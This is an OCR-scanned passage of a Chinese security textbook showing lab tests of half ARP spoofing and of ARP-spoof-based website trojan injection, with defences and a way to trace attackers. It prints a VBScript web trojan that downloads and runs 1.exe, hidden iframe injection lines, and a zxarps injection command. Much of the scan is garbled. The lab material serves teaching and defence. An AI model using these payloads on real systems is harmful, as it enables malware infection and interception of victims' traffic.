马 代 码 的 字 节 个 数 ; 在 二 html 才 标识 之 前 多 出 了 一 段 挂 马 代 码 : 二 iframe src 一 "http:// 
61. 50. 10. 26/1. html" ; width 一 "0" height 王 "0" frameborder 王 "0" 盖 亏 /iframe 之。 这 是 
一 种 框架 挂 马 方式 ,用 户 访问 index. asp 之 后 ,会 自动 到 包含 木马 程序 的 服务 器 61. 50. 
10. 26 上 下 载 并 浏览 1. html, 这 个 1. html 会 利用 正 浏览 器 漏洞 自动 下 载 并 运行 木马 程 
序 ( 例 如 1. exe) ,由 于 这 里 将 框架 的 高 度 、 宽 度 和 边框 粗细 均 设 置 为 0, 因 此 受害 者 在 浏览 
index. asp 时 不 会 察觉 到 任何 变化 ,木马 程序 会 自动 下 载 并 运行 。 
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473 half ARP spoof 攻击 测试 


按 如 图 4-61 所 示 网 络 拓扑 搭建 实验 环境 ,本 机 作为 "中间人 ?对 网 关 和 受害 者 主机 发 
起 ARP 坎 骗 攻击 ,由 于 受害 者 主机 端 预 先 绑 定 了 网 关 的 IP 和 MAC 地 址 ,因此 对 受害 者 
的 ARP 欺骗 失败 ,但 对 网 关 的 欺骗 成 功 实施 。 这 导致 受害 者 通过 SMTP 向 外 网 发 送 的 
电子 邮件 可 以 直接 交付 给 网 关 , 而 外 部 邮件 服务 器 通过 POP3 协议 返回 的 电子 邮件 却 经 
过 “中 间 人 ”中 转 。 实 验 步 又 如 下 。 

第 一 步 : 按 图 4-61 组 建 网 络 并 配置 IP 和 MAC 地 址 。 

为 了 便于 分 析 网 络 数据 ,这 里 需要 手工 配置 接口 的 MAC 地 址 。Windows 2000 虚拟 
机 2 的 网 关 设 置 为 202. 1. 1.1, Windows XP 虚拟 机 和 本 机 的 网 关 设置 为 192. 3. 3.1。 使 
用 ping 命令 测试 网 络 连通 情况 。 

Windows 2000 虚 拟 机 2 。 202.1.1.10 


(邮件 服务 器 )  e0-e0-e0-e0-e0-e0 受害 者 ARP 缓 存 表 
92.3.3.1 a0-a0-a0-a0-a0- i 
J 202.1.1.0 192.3.3.1 a0-a0-a0-a0-a0-a0 static 
192.3.3.3 
192.3.3.1 
202.1.1.1 c0-c0-c0-c0-c0-c0 
d0-d0-d0-d0-d0-d0 “~~ 0 
192.3.3.0 
MTP 
Windows 2000 虚 所 机 1 入 、 一 一 = 人 = 人 -一 流量 Windows Xp 虚拟 机 
(NAT 网 关 ) to、、 4 (受害 者 ) 
7, ~、 Ba 
网 关 的 ARP 缓 存 表 党 和、 “AS 
二 192.3.3.2 
192.3.3.3 b0-b0-b0-b0-b0-b0 dynamic Fp bo-b0-b0-b0-b0-bO 
(中 间 人 ) 


图 4-61 网 络 拓扑 


第 二 步 : 在 Windows 2000 虚拟 机 1 上 开启 NAT 地 址 转换 功能 (步骤 略 ) 。 

第 三 步 : 在 Windows 2000 虚拟 机 2 上 安装 电子 邮件 服务 器 。 

在 Windows 2000 虚拟 机 2 上 安装 “ 易 邮 ” 邮 件 服务 器 (安装 步骤 略 )。 安 装 完成 之 后 
设置 邮件 服务 器 的 域名 。 步 又 如 下 : 在 易 邮 服务 器 控制 界面 单 击 “ 工 具 ” 菜 单项 一 选择 
“服务 器 设置 ”一 在 “ 单 域名 ”对 话 框 中 输入 “ccpc. com”。 

在 邮件 服务 器 上 分 配 两 个 邮箱 mike 和 peter。 步 又 如 下 : 在 易 邮 服务 器 控制 界面 单 击 
“账户 ”菜单 项 一 选择 “新 建 账户 ”一 在 基本 信息 页 面 输入 账户 mike、 密 码 86982480, 单 击 “ 确 
定 ” 按 钮 。 再 用 同样 的 方法 添加 账户 peter、 密 码 86982481。 配 置 好 的 界面 如 图 4-62 所 示 。 


EELL EE 

操作 (O) 有 账号 (的 ”工具 (D 帮助 (H) 

| 入 章 几 号 = 设置 起 | 分 状态 [群发 ”四 报表 | "注册 隐语” 买 关 闭 
NE TT EE 


2005/j08/23 11: :20 44 允许 


2005jo8j23 11:21:04 ”允许 


-> 3 用 户 | 08123105 | 11:22:13 才 
图 4-62 添加 了 两 个 账户 
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第 四 步 : 在 本 机 使 用 outlook express 配置 mike 账户 ,在 Windows XP 虚拟 机 使 用 
outlook express 配置 peter 账户 ,测试 邮件 的 收发 。 

下 面 以 mike 账户 为 例 介 绍 outlook express 配置 步骤 : 启动 本 机 outlook express 一 
单 击 “ 工 具 ” 菜 单项 一 选择 “账户 ”一 单 击 “ 添 加 ”按钮 一 选择 邮件 一 在 “显示 名 ”对 话 框 中 输 
入 “mike” 一 单 击 “下 一 步 ? 一 在 “电子 邮件 地 址 ?对 话 框 中 输入 “mike@ ccpc. com” 一 单 击 
“下 一 步 ? 按 钮 一 在 “接收 邮件 服务 器 ”对话 框 和 "发 送 邮件 服务 器 ?对 话 框 中 都 输入 “202. 
1.1.2”( 即 邮件 服务 器 IP 地 址 ) 一 单 击 * 下 一 步 ? 按 钮 一 账户 名 输入 "mike”、 密 码 输入 
“86982480” 一 单 击 “ 下 一 步 ? 按 钮 一 单 击 “ 完 成 > 按钮。 配置 好 的 账户 界面 如 图 4-63 所 示 。 
用 同样 方法 在 Windows XP 虚拟 机 配置 好 peter 账户 。 


Internet 账户 


全 部 | 邮件 ”| 新闻 | 目录 服务 | 


帐户 类 型 连接 

给 202.1.1.2 邮件 你 认 ) 任何 可 用 连接 
Aetive Diree, .目录 服务 

EE Inte, . ， 目录 服务 设 为 默认 值 0) 
VeriSien Int..， 目 录 服 务 


WhoWhere Int, 目录 服务 导入 (LD)... 
导出 到 ). 


关闭 


图 4-63 配置 好 的 账户 界面 


第 五 步 : 使 用 mike 邮箱 给 peter 发 送 邮 件 。 

使 用 mike 邮箱 给 peter 发 送 邮 件 ,步骤 如 下 : 在 outlook express 中 单 击 “创建 邮件 ” 
一 收 件 人 输入 "peter@ccpc. com” 一 主题 输入 "hello" 一 正文 输入 "你 好 ”一 单 击 * 发 送 ” 按 
钮 。 邮 件 发 送 界面 如 图 4-64 所 示 。 


; 文件 @) 编辑 EE) 查看 W) 插入 I) 格式 0 工具 ” 太 
了 WA a r= » 
咏 |% 四 蜀 只 
发 送 前 切 复制 粘贴 拆 销 


固 收 件 人 : [peter@ecpe com 
国 抄 送 : [ 


主题 : hello 


朵 仁 司 |lo 图 至 


你 好 


图 4-64 邮件 发 送 界面 


第 六 步 : 在 Windows XP 虚拟 机 端 静态 绑 定 网 关 的 IP 和 MAC 地址。 
在 Windows XP 虚拟 机 端 静态 绑 定 网 关 的 IP 和 MAC 地 址 ,静态 地 址 绑 定 命 令 格 式 
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如 下 : arp -s IP 地 址 MAC 地 址 。 在 Windows XP 虚拟 机 执行 arp -s 192. 3. 3. 1 a0-a0- 
a0-a0-a0-a0 命令 ,之 后 查看 Windows XP 虚拟 机 的 ARP 缓存 表 , 可 以 看 到 静态 绑 定 成 
功 ,如 图 4-65 所 示 。 


oC:\VINDOYS\systen32\cad. exe 
C:\>arp -s 192.3.3.1 ag-ag-ag-ag-ag-ag 


C:\>arp -a 


Interface: 192.3.3.3 --- OQx30003 
Internet Address Physical Address 
192.3.3.1 ag-ag-ag-ag-ag-ag static 


图 4-65 静态 地 址 绑 定 结果 


第 七 步 : 在 本 机 使 用 cain 对 网 关 和 Windows XP 虚拟 机 发 起 ARP 欺骗 攻击 。 

在 本 机 使 用 cain 对 网 关 和 Windows XP 虚拟 机 发 起 ARP 欺骗 攻 击 ( 具 体 步 又 略 ) 。 
图 4-66 给 出 的 是 攻击 前 后 Windows XP 虚拟 机 的 缓存 表 , 可 见 攻击 之 后 网 关 的 IP 地 址 
没有 映射 为 中间人 ”的 MAC, 即 Windows XP 虚拟 机 发 给 外 网 的 数据 报 仍然 直接 提交 
给 网 关 。 


oC:\WINDOYS\systen32\cad. exe [- 口 jz| 
C:N>arp -a 
Interface: 192.3.3.3 --- Ox30003 
Internet Address Physical Address Type 
192.3.3.1 ag9-ag-a0-ag-ag-ag static Se 
DE 攻击 前 
C:N>arp -a 
Interface: 192.3.3.3 --- OQx30003 
Internet Address Physical hddress Type 
| a0-a0-a0-a0-a0-a0 static 攻击 后 
192.3.3.2 bo-b0-bO-bO-bO-bO dynamic 久 击 后 


图 4-66 攻击 前 后 Windows XP 虚拟 机 的 缓存 表 


图 4-67 给 出 的 是 攻击 前 后 网 关 的 缓存 表 , 可 见 Windows XP 虚拟 机 的 IP 地 址 被 错 
误 地 映射 为 攻击 者 (本 机 ) 的 MAC 地 址 。 这 样 一 来 ,网 关 转 发 给 Windows XP 虚拟 机 的 
数据 报 将 被 提交 给 本 机 。 

第 八 步 : 在 Windows XP 虚拟 机 发 送 邮 件 ,使 用 Sniffer Pro 分 析 数 据 流 向 。 

在 Windows XP 虚拟 机 使 用 peter 账户 给 mike 发 送 一 封 电子 邮件 ,使 用 Sniffer Pro 
捕获 分 析 SMTP 数据 报 的 传输 流向 。 发 给 mike 的 邮件 如 图 4-68 所 示 。 

首先 Windows XP 虚拟 机 将 邮件 数据 报 发 送 给 网 关 , 注 意 此 时 源 IP 地 址 为 192. 3. 
3.3, 如 图 4-69 所 示 。 

图 4-70 为 网 关 转 发 给 邮件 服务 器 的 数据 报 , 可 见 此 时 源 IP 地 址 已 经 转换 为 全 局 地 
址 202.1.1.1。 通 过 这 两 个 报 文 可 知 Windows XP 虚拟 机 发 送 的 邮件 没有 经 过 “中 间 人 ” 
中 转 。 
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C:XDocuments and SettingsNhdministrator>arp -aa 


Interface: 192.3.3.1 on Interface 9x7999693 


Internet hddress Physical hddress Type 
192.3.3.3 cg9-c9-c9e-cg-cg-cge dynamic 人 
| 攻击 前 
C:\Documents and Settings\Administrator>arp -a 
Interface: 192.3.3.1 on Interface QOQx7?7000003 
Internet hddress Physical hddress Type 
192.3.3.3 bg9-bg-bg-b9-b9-b9 dynamic 
者 后 
» 
e 
发 送 E 擅 销 
国 收 怕人 ; [mike@eccpccom 
[Ea E23 
|hero 
| 宋体 加 lo 国 喜 |B7UA.| 丘 
I am peter 
图 4-68 发 给 mike 的 邮件 
处 IP:19 
目的 MAC: 网 关内 网 接口 尖 MAC:XP 虑 拟 机 汪 有 二 站 多 
00000000 : 条 条 舱 览 览 览 .EE 
00000010 : ?;:@.6. 入 ? 
00000020 : 
00000030 : 
00000040 
00000050 : 
00000060 : 
00000070 : 
00000080: 2 
00000090 : 
000000a0 : 
目的 端口 :25 
图 4-69 Windows XP 虚拟 机 发 给 网 关 的 邮件 数据 报 
目的 MAC: 邮件 服务 器 源 MAC: 网 关外 网 接口 
00000000: e0 e0 e0le0 e0 e0 d0 do doldo do do 08 
00000010: 4 7f 0 
00000020 : e4 
00000030: 65 
00000040 : 
00000050 : 
00000060 : 
00000070 : 
00000080 : a 6 3 1 
00000090: 5 5 IC . CO 有 
000000a0 : 3 5 0 6 hello 
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第 九 步 : 在 Windows XP 虚拟 机 接收 邮件 ,使 用 Sniffer Pro 分 析 数 据 流 向 。 

在 Windows XP 虚拟 机 使 用 peter 账户 接收 电子 邮件 ,使 用 Sniffer Pro 捕获 分 析 
POP3 数据 报 的 传输 流向 。 

图 4-71 是 邮件 服务 器 发 给 网 关 的 邮件 数据 报 , 其 目的 IP 地 址 是 网 关 的 外 网 接口 IP， 
该 数据 报 携带 了 电子 邮件 的 发 件 人 、 收 件 人 主题 .正文 等 信息 。 此 时 报 文 的 目的 IP 地址 
是 202. 和 1 


源 IP:202.1.1.2 
目的 MAC: 网 关外 网 接口 庆 MAC: 邮件 服务 器 目的 ITP:202. 1.1.1 
0000000: d0 d0 d0|d0 d0 d0 e0 e0 e0|e0 e0 e0 08|00 45 00| 行 行 行 噜 史 喘 . .E 
0000010: 05 8b 38 e8 40 00 80 06 26 7f ca 01 01|02 ca 01| .? 缮 .5&l2?..? 
0000020: 01 01 00 6e 04 b3 59 13 b4 05 03 db c8 dd 50 18 ,..n. 破 .?. 均 埋 . 
0000030: 44 39 04 f2 00 00 52 65 74 75 72 6e 2d 50 61 74 D9.?. Return-Pat 
0000040: 68 3a 20 3c 6d 69 6b 65 40 63 63 70 63 2e 63 6f h: mike@ccpc .co 
0000050: 6d 3e 0d 0a 52 65 63 65 69 76 65 64 3a 20 66 72 m>..Received: fr 
0000060: 6f 6d 20 63 63 70 63 61 36 65 33 64 61 34 61 35 om ccpca6e3da4a5 
0000070: 31 20 28 75 6e 6b be 6f 77 6e 20 Sb 32 30 32 2e 1 (unknown [202 
0000080: 31 2e 31 2e 31 5d 29 0d 0a 09 62 79 20 63 63 70 1.1.1])...by ccp 
0000090: 63 2e 63 6f 6d 20 77 69 74 68 20 43 4d 61 69 6c c.com with CMail 
00000a0: 53 65 72 76 65 72 20 35 2e 32 20 53 4d 54 50 3b Server 5.2 SMTP; 
00000b0: 20 54 75 65 2c 20 32 33 20 41 75 67 20 32 30 30 Tue, 23 Aug 200 
00000c0: 35 20 31 31 3a 33 39 3a 31 38 20 2b 30 38 30 30 5 11:39:18 +0800 
00000d0: 0d 0a 4d 65 73 73 61 67 65 2d 49 44 3a 20 3c 34 . .Message-ID: <4 
00000e0: 34 31 34 45 34 45 37 46 46 38 33 34 38 33 33 42 414E4E7FF834833B 
00000£0: 35 44 32 33 36 38 32 34 31 39 42 39 32 39 31 40 5D23682419B9291@ 
0000100: 63 63 70 63 61 36 65 33 64 61 34 61 35 31 3e 0d ccpca6e3da4a51》， 
0000110: Da 46 72 6f 6d 3a 20 22 6d 69 6b 65 22 20 3c 6d .From: "mike” <m 
0000120: 69 6b 65 40 63 63 70 63 2e 63 6f 6d 3e 0d 0a 54 ike@ccpc.com>..T 
0000130: 6f 3a 20 3c 70 65 74 65 72 40 63 63 70 63 2e 63 0o; peter@ccpc.c 
0000140: 6f 6d 3e 0d 0a 53 75 62 6a 65 63 74 3a 20 68 65 om>..Subject: he 
0000150: 6c 6c 6f Od oa 44 61 74 65 3a 20 54 68 75 2c 20 llo. .Date: Thu, 
后 面 连续 数据 省 略 


图 4-71 邮件 服务 器 发 给 网 关 的 邮件 数据 报 


图 4-72 是 网 关 转 发 给 “中 间 人 ”的 邮件 数据 报 , 可 见报 文 的 目的 IP 地 址 变换 为 192. 
3 


产 IP:202. 1. 1.2 

目的 MAC: “中间人 ” 海 MAC: 网 关内 网 接口 目的 IP: 192. 3. 3. 3 

b0|b0 b0 b0 a0 a0 a0|a0 a0 a0 08|00 45 00| 鞍 鞍 鞍 舱 秽 租 . .E. 

2f 7b ys 
00 6e 04 b3 59 13 b4 05 03 db cg dd 50 18 ...n. 破 .7?. 庆 埋 . 

: 0c ee 00 00 52 65 74 75 72 6e 2d 50 61 74 D9.?. Return-Pat 
0000040: 68 3a 20 3c 6d 69 6b 65 40 63 63 70 63 2e 63 6f h: < 人 nike@ccpc.col 
0000050: 6d 3e 0d 0a 52 65 63 65 69 76 65 64 3a 20 66 72 my. .Received: fr 
0000060: 6f 6d 20 63 63 70 63 61 36 65 33 64 61 34 61 35 om ccpca6e3da4a5 
0000070: 31 20 28 75 be 6b 6e 6f 77 ke 20 Sb 32 30 32 2e 1 (unknown [202. 
0000080: 31 2e 31 2e 31 sd 29 0d 0a 09 62 79 20 63 63 70 1.1.1])...by ccpl 


0000090: 63 2e 63 6f 6d 20 77 69 74 68 20 43 4d 61 69 6c c.com with CMail 
00000a0: 53 65 72 76 65 72 20 35 2e 32 20 53 4d 54 50 3b Server 5.2 SMTP:; 
00000b0: 20 54 75 65 2c 20 32 33 20 41 75 67 20 32 30 30 Tue. 23 Aug 200| 
00000c0: 35 20 31 31 3a 33 39 3a 31 38 20 2b 30 38 30 30 5 11:39:18 +0800| 


00000d0: 0d oa 4d 65 73 73 61 67 65 2d 49 44 3a 20 3c 34 ..Message-ID: «<4 
00000e0: 34 31 34 45 34 45 37 46 46 38 33 34 38 33 33 42 414E4E?7FF834833B| 
00000£0: 35 44 32 33 36 38 32 34 31 39 42 39 32 39 31 40 5D23682419B9291@| 
0000100: 63 63 70 63 61 36 65 33 64 61 34 61 35 31 3e 0d ccpca6e3da4a517> . 
0000110: 0a 46 72 6f bd 3a 20 22 6d 69 6b 65 22 20 3c 6d .From: "mike" <ml 
0000120: 69 6b 65 40 63 63 70 63 2e 63 6f 6d 3e 0d 0a 54 ike@ccpc.com>..T| 
0000130: 6f 3a 20 3c 70 65 74 65 72 40 63 63 70 63 2e 63 D: peter@ccpc.c 
0000140: 6f 6d 3e 0d 0a 53 75 62 6a 65 63 74 3a 20 68 65 om>..Subject: he| 
0000150: 6c 6c 6f Od 0a 44 61 74 65 3a 20 54 68 75 2c 20 llo. .Date: Thu. 


后 面 连续 数据 省 略 


4-72 ”网 关 转 发 给 “中 间 人 ”的 邮件 数据 报 


通过 分 析 数 据 报 可 以 发 现 ,接收 邮件 产生 的 POP3 数据 经 过 “中 间 人 ”转发 到 
Windows XP 虚拟 机 。 
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00000000 : 
00000010: 0 
00000020: 0 
00000030 : 
00000040: 6 
00000050: 6 
00000060 : 
00000070: 3 
00000080 : 
00000090: 6 
000000a0 : 


目的 MAC:SP 庶 拟 宙 源 MAC:“ 中 间 人 ” 


Bolbo bo b0 08 
ca 01 01|0 


eturn-Pat 
ike@ccpc .co 
Received: fr 
5 om ccpca6e3da4a9 
e 1 (unknown [20 
1 er | by ccB 
c.com with CMail 
Server 5.2 SMTP:; 


3e 0d 0a 
6f 6d 20 63 
20 28 75 


图 4-73 “中 间 人 ”转发 给 Windows XP 虚拟 机 的 数据 报 


第 十 步 : 在 网 关 端 绑 定 Windows XP 虚拟 机 的 IP 和 MAC 地 址 ,判断 数据 流向 。 
为 了 防御 half ARP spoof 攻击 ,在 网 关 端 也 绑 定 Windows XP 虚拟 机 的 IP 和 MAC 
地 址 ,如 图 4-74 所 示 。 之 后 在 本 机 再 次 发 起 ARP 欺骗 攻击 ,可 以 发 现 攻击 失败 。 


4.8 


ENCNVWWINNT\System32\Vcmd.exe 
C:\>arp -s 192.3.3.3 cg-cg-c9-cg-cg-c9 
C:\>arp -a 


Interface: 192.3.3.1 on Interface OQx7000003 
Internet hddress Physical hddress 
192.3.3.3 c9-c9-c9-c9-c9-c9 static 


Interface: 202.1.1.1 on Interface OQx8000004 
Internet hddress Physical hddress Type 
202.1:1:2 eg-e9-e0-eg-e9-e9 dynamic 


C:\> 
| "| 


图 4-74 在 网 关 绑 定 Windows XP 虚拟 机 的 IP 和 MAC 地 址 


ARP 欺骗 攻击 者 的 调查 方法 


ARP 欺骗 对 局 域 网 构成 较 大 的 安全 威胁 ,如 何 找 出 ARP 欺骗 攻击 者 使 用 计算 机 的 


IP 地 址 呢 ? 这 里 


总 结 了 两 个 基本 步骤。 


一 步 : 扫描 本 网 段 内 所 有 主机 的 IP 地址 和 MAC 地 址 。 这 可 以 使 用 扫描 软件 来 实 
现 , 例 如 nmap、cain, 得 到 类 似 图 4-75 所 示 结 果 。 


Internet Address Physical Address 
192. 168. 0. 1 01-01-01-01-01-01 
192. 168. 0. 2 02-02-02-02-02-02 
192. 168. 0. 3 03-03-03-03-03-03 


图 4-75 扫描 本 网 段 所 有 主机 的 IP 和 MAC 地 址 


第 二 步 : 在 被 攻击 主机 上 查看 ARP 缓存 表 , 用 缓存 记录 中 的 MAC 地 址 到 第 一 步 得 
到 的 数据 库 中 去 查找 ,匹配 记录 对 应 的 IP 地 址 即 为 攻击 者 计算 机 的 IP。 例 如 ,在 受害 者 
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主机 的 缓存 中 记录 了 如 图 4-76 所 示 这 条 记录 ,取出 02-02-02-02-02-02 到 图 4-75 数据 库 
中 查找 ,可 以 得 知 攻击 者 使 用 主机 的 IP 为 192. 168. 0.2。 


Internet Address Physical Address 
192. 168. 0. 1 02-02-02-02-02-02 


图 4-76 受害 者 主机 缓存 中 保存 的 记录 


jg ”基于 ARP 欺骗 的 网 站 挂 马 测试 


49.1 基于 ARP 欺骗 的 网 站 挂 马 简 介 


图 4-77 为 攻击 示意 图 。 攻 击 者 首先 对 网 关 和 受害 者 实施 ARP 欺骗 攻击 ,使 自己 成 
为 受害 者 与 外 网 通信 和 的“ 中间人”。 受 害 者 在 浏览 主页 (例如 index. asp) 时 、 发 出 的 
HTTP 请 求 报 文 经 过 攻击 者 中 转 给 Web 服务 器 。 在 HTTP 应 答 报 文中 包含 index. asp 
的 源 代码 ,攻击 者 在 HTML 代码 中 植 入 一句 挂 马 代码 ,再 将 其 转发 给 受害 者 。 如 果 受 害 
者 主机 没有 及 时 打 补 丁 , 将 在 挂 马 代 码 的 引导 下 、 到 攻击 者 的 Web 服务 器 下 载运 行 木马 
程序 。 


true hacker 


Web Server Web Server 
10.1.1.2 到 10.1.1.0 10.1.1.3 
六 性 
人 人 人、、@ 、、@ 
~、、、~~、 ~ 
On、~、 ~、 、 
号 
50.1.1.0 一 
gateway 、、 # victim 
~® 3 
Se 2 
@ ~ @ 
CD HTTP request 
@ HTTP reply hacker 


G) modified HTTP reply (inject code) 
由 download and run horse 


图 4-77 攻击 示意 图 


492 测试 环境 和 测试 目的 

测试 环境 如 图 4-78 所 示 。Windows XP 虚拟 机 1 作为 正常 Web 服务 器 、Windows 
XP 虚拟 机 2 作为 黑客 的 Web 服务 器 、Windows XP 虚拟 机 3 作为 攻击 者 、Windows XP 
虚拟 机 4 作为 受害 者 、Windows 2000 虚拟 机 作为 网 关连 接 两 个 网 络 ,各 个 对 象 的 地 址 信 
息 如 图 4-78 所 示 。 

测试 目的 是 在 受害 者 浏览 Web 服务 器 主页 时 ,攻击 者 在 返回 的 HTTP 应 答 数 据 中 
植 人 挂 马 代 码 ,导致 受害 者 自动 到 黑客 的 Web 服务 器 去 下 载 并 运行 木马 程序 。 
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Web hacker 
服务 器 服务 器 
10.1.1.2 | Windows XP Windows XP 10.1.1.3 
00-0C-29-25-66-36 [和 = 虚拟 机 1 虚拟 机 2 ay 00-0C-29-FE-B9-85 
10.1.1.1 
00-0C-29-A3-70-45 受害 者 
,| Windows XP 50.1.1.3 
Windows 2000 虚 所 1@3 
eo 0 网 关 虚拟 机 4 00-0C-29-9A-60-AB 
00-0C-29-A3-70-40 


Windows XP 和 50.1.1.2 


虚拟 机 3 00-0C-29-24-21-39 
攻击 者 
图 4-78 测试 环境 


493 测试 步骤 


第 一 步 : 配置 各 个 对 象 的 地 址 信息 。 

以 host-only 方式 启动 4 台 Windows XP 虚拟 机 和 一 台 Windows 2000 虚拟 机 ,参照 
图 4-78 配置 各 个 对 象 的 IP 地 址 。 注 意 Windows XP 虚拟 机 1 和 Windows XP 虚拟 机 2 
的 网 关 设 置 为 10. 1.1.1,Windows XP 虚拟 机 3 和 Windows XP 虚拟 机 4 的 网 关 设置 为 
S01. 1 

第 二 步 : 在 Web 服务 器 设置 简单 的 主页 。 

在 Web 服务 器 的 主 目录 下 放置 电子 商务 网 站 shop, 浏 览 网 站 主页 ,结果 如 图 4-79 所 示 。 


到 xgt - Nicrosoft Internet Explorer 


文件 人 ) 编辑 人 E) 查看 @) 收 诚 &) 工具 区) 帮助 0 


地 址 回 ) | 御 http://10.1.1.2/index. asp 


ip 


小 | [ 网 站 首页 ”最 新 商品 “推荐 商品 “热门 商品 “商品 分 类 
SHOPPING MALL Index Jewgoods ”Conmend Hot Sort 


Www.MINGRISOFT.COM 3 产品 名 称 搜索 | | 


用 各 : 时 呈 0 最 新 Uptodate 
= = 


图 4-79 浏览 Web 服务 器 主页 
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第 三 步 : 攻击 者 配置 木马 控制 端 和 网 页 木马 。 

攻击 者 配置 木马 控制 端 1. exe 和 网 页 木马 1. html, 并 将 它们 放置 到 黑客 服务 器 的 主 
目录 下 。 本 例 使 用 PcShare 木马 ,其 配置 界面 如 图 4-80 所 示 ,IP 地 址 为 攻击 者 主机 的 
IP ,端口 保留 默认 的 3030, 单 击 “ 生 成 ”按钮 ,文件 名 设置 为 1. exe。 


被 控制 端 执行 程序 参数 ( 非 高 级 用 户 请 选择 默认 配置 ) 


三 通信 连接 相关 配置 可 以 为 域名 或 fF 地 址 ) 一 一 一 一 一 一 一 一 一 
ITP 地址 [端口 ] : |50.1.1.2 本 Foa 
:| 脂 定 一 个 中 苇 URLI 文 件 ue 
新 创建 服务 的 参数 设置 文件 名 称 不 能 有 空格 和 非 ASCII 字 符 ) 
服务 文件 名 称 : [自动 生成 插入 进程 : | 默认 浏览 器 二 
| 


服务 显示 名 称 : | 目 动 生成 

服务 附加 描述 : [下 吉 生 成 

三 特性 参数 设置 (客户 连接 密码 在 参数 设置 里 设置 ) 一 一 一 一 一 一 一 
客户 自 带 标识 : 甘 认 计 四 机 名。 。。。。。。。 厂 启 用 驱动 隐 敬 
记 所 展 分 姐 :| 通天 。。” 订 帮 用 和 
断 线 重 连 超时 : 0 ” 秒 厅 运行 后 自动 册 除 EXE 文件 


生成 退出 
图 4-80 ”PcShare 的 配置 界面 


攻击 者 使 用 MS06014 网 马 生成 器 制作 网 页 木马 ,在 文本 框 里 输入 http://10.1.1.3/ 
1. exe, 单 击 “ 生 成 ”按钮 ,生成 名 为 1. html 的 网 页 木马 ,其 源 代 码 如 图 4-81 所 示 。 通 过 分 
析 脚 本 可 以 看 出 , 它 的 功能 是 引导 受害 者 主机 到 10. 1. 1. 3( 黑 客服 务 器 ) 去 下 载 并 运行 森 
马 程序 (1. exe) ,如 图 4-81 所 示 。 最 后 攻击 者 将 1. exe 和 1. html 放置 到 黑客 服务 器 的 主 
目录 下 。 


外 1.htal - 记事 本 


文件 中 编辑 于 ) 格式 中) 查看 W) 帮助 00) 
<htnl> 
《script language= VBScript”> 
on error resune next 
dl = “http: /WWWE)/1. exe 
Set df = document. ent ob"&” ject”) 
df. setAttribute “classid”, “clsid: BD962557 和 6-65A3-11D0-983A-00C04FC29E36” 
str=“Microsoft”&”. LHTIP” 
Set x =,df. CreateObject (str, ”) 
do” 


set 3 = df.createobject(str5& mn’, ”) 
=1 


.Sen 

fnanel="g01d’&”. con” 

set F = df.createobject(’Scripti’&’ng.FilesystemObject”, “) 
set tmp = F.GetSpecialFolder (2) 

5. open 

fnanel= F. BuildPath(tnp, fnanel) 

S. Write x.responseBody 

S. savetofile fnanel,2 

5. close 

set Q = df.createobject(”Shell. 名 & -plication’, | 
Q. ShellExecute fnanel,”,”“, “ope & 

Cfscript> 


图 4-81 生成 的 网 页 木马 1. html 
第 四 步 : 对 网 关 和 受害 者 实施 ARP 欺骗 攻击 。 
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攻击 者 利用 工具 zxarps 对 网 关 和 受害 者 实施 ARP 欺骗 攻击 ,zxarps 的 运行 命令 如 
图 4-82 所 示 。 参 数 -idx 指明 网 卡 的 编号 ,-ip 参数 指明 受害 者 的 IP 地 址 ,-port ie 
监听 的 端口 为 web 服务 端口 80,-insert 参数 指明 植 入 的 挂 马 代码 。 当 zxarps 发 现 Web 
服务 器 返回 给 受害 者 的 第 一 个 HTTP 应 等 数据 包 时 ,自动 在 其 中 植 入 挂 马 代 码 “<iframe 
src=" http://10. 1. 1. 3/1. html"; width="0" height="0" frameborder="0"> 
到 /iframe 之 ”, 这 er oa 0, 这 样 在 受害 者 看 到 的 网 页 上 不 会 
有 任何 异常 ,但 “src 二 http://10.1.1.3/1. html” 这 条 语句 会 引导 受害 者 到 黑客 服务 器 去 
下 载 1. html, 这 个 网 页 文件 会 we 步 引导 受害 者 下 载 并 运行 木马 程序 1. exe, 从 而 使 受害 
者 主机 沦 为 一 台 “ 肉 鸡 ”。 


C:\>zxarps.exe -idx 9 -ip 59.1.1.3 -port 80 -insert “iframe src="“http://19.1.1. 


3/1.html”; width="0" height="0" |frameborder="0"> </iframe>” 


网 页 木马 受害 者 人 P 黑客 服务 器 IP 


图 4-82 ”zxarps 的 运行 命令 


如 图 4-83 所 示 ,zxarps 处 于 监听 状态 。 


0. UMware Accelerated AMD PCNet Adapter 
IP Address. . 。 50.1.1.2 
Physical Address. . : 00-0C-29-24-21-39 
Default Gateway ， > 
[x] Bind on 50.1.1.2 UMware Accelerated AMD PCNet Adapter... 


图 4-83 ”zxarps 处 于 监听 状态 


攻击 者 利用 zxarps 对 受害 者 主机 实施 ARP 欺骗 攻击 ,使 受害 者 主机 的 ARP 缓存 表 
中 网 关 的 IP 地 址 映射 为 攻击 者 的 MAC 地址。 构造 的 ARP 欺骗 报 文 如 图 4-84 所 示 。 

这 是 一 个 伪造 的 ARP 应 答 报 文 , 共 60 字 节 ,包括 14 字 节 链 路 层 数据 、28 字 节 ARP 
数据 和 18 字 节 的 填充 数据 。 

链 路 层 数据 中 ,目的 MAC 地 址 为 受害 者 主机 MAC 地 址 , 源 MAC 地 址 为 攻击 者 主 
机 MAC ,协议 类 型 为 0x0806( 表 示 网 络 层 为 ARP 数据 ) 。 

ARP 数据 中 目的 IP 和 MAC 地 址 为 受害 者 , 源 IP 地 址 为 网 关 , 源 MAC 地 址 为 攻击 
者 主机 MAC, 这 使 得 受害 者 误 认 为 这 是 网 关 发 给 自己 的 ARP 应 答 报 文 , 于 是 取出 源 IP 
和 源 MAC 地 址 记录 到 ARP 缓存 表 中 ,从 而 将 网 关 的 IP 地 址 错误 地 映射 为 攻击 者 主机 
的 MAC, 导 致 受害 者 以 后 发 给 外 网 的 数据 包 将 传送 给 攻击 者 主机 。 图 4-85 为 在 受害 者 主 
机 上 查看 到 的 ARP 缓存 表 , 可 见 网 关 的 人 地址 50. 1.1. 1 映射 为 攻击 者 的 MAC 地 址 。 
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victim MAC 


hacker MAC 
个 28B 
一 一 
Link data ARP data padding data 
一 一 | 一 一 
14B U 18B 
0001 0800 
06 | 04 0002 


gateway ip 


hacker MAC 


victim ip 


victim MAC 


图 4-84 ”发送 给 受害 者 主机 的 ARP 欺骗 报 文 


Interface: 50.1.1.3 --- Ox20003 
Internet Address Physical Address Type 


50.1.1.1 网 关 IP 90-9c-29-24-21-39 dynamic 
1 00-0c-29-24-21-39 dynamic 


攻击 者 MAC 
图 4-85 受害 者 的 ARP 缓存 表 


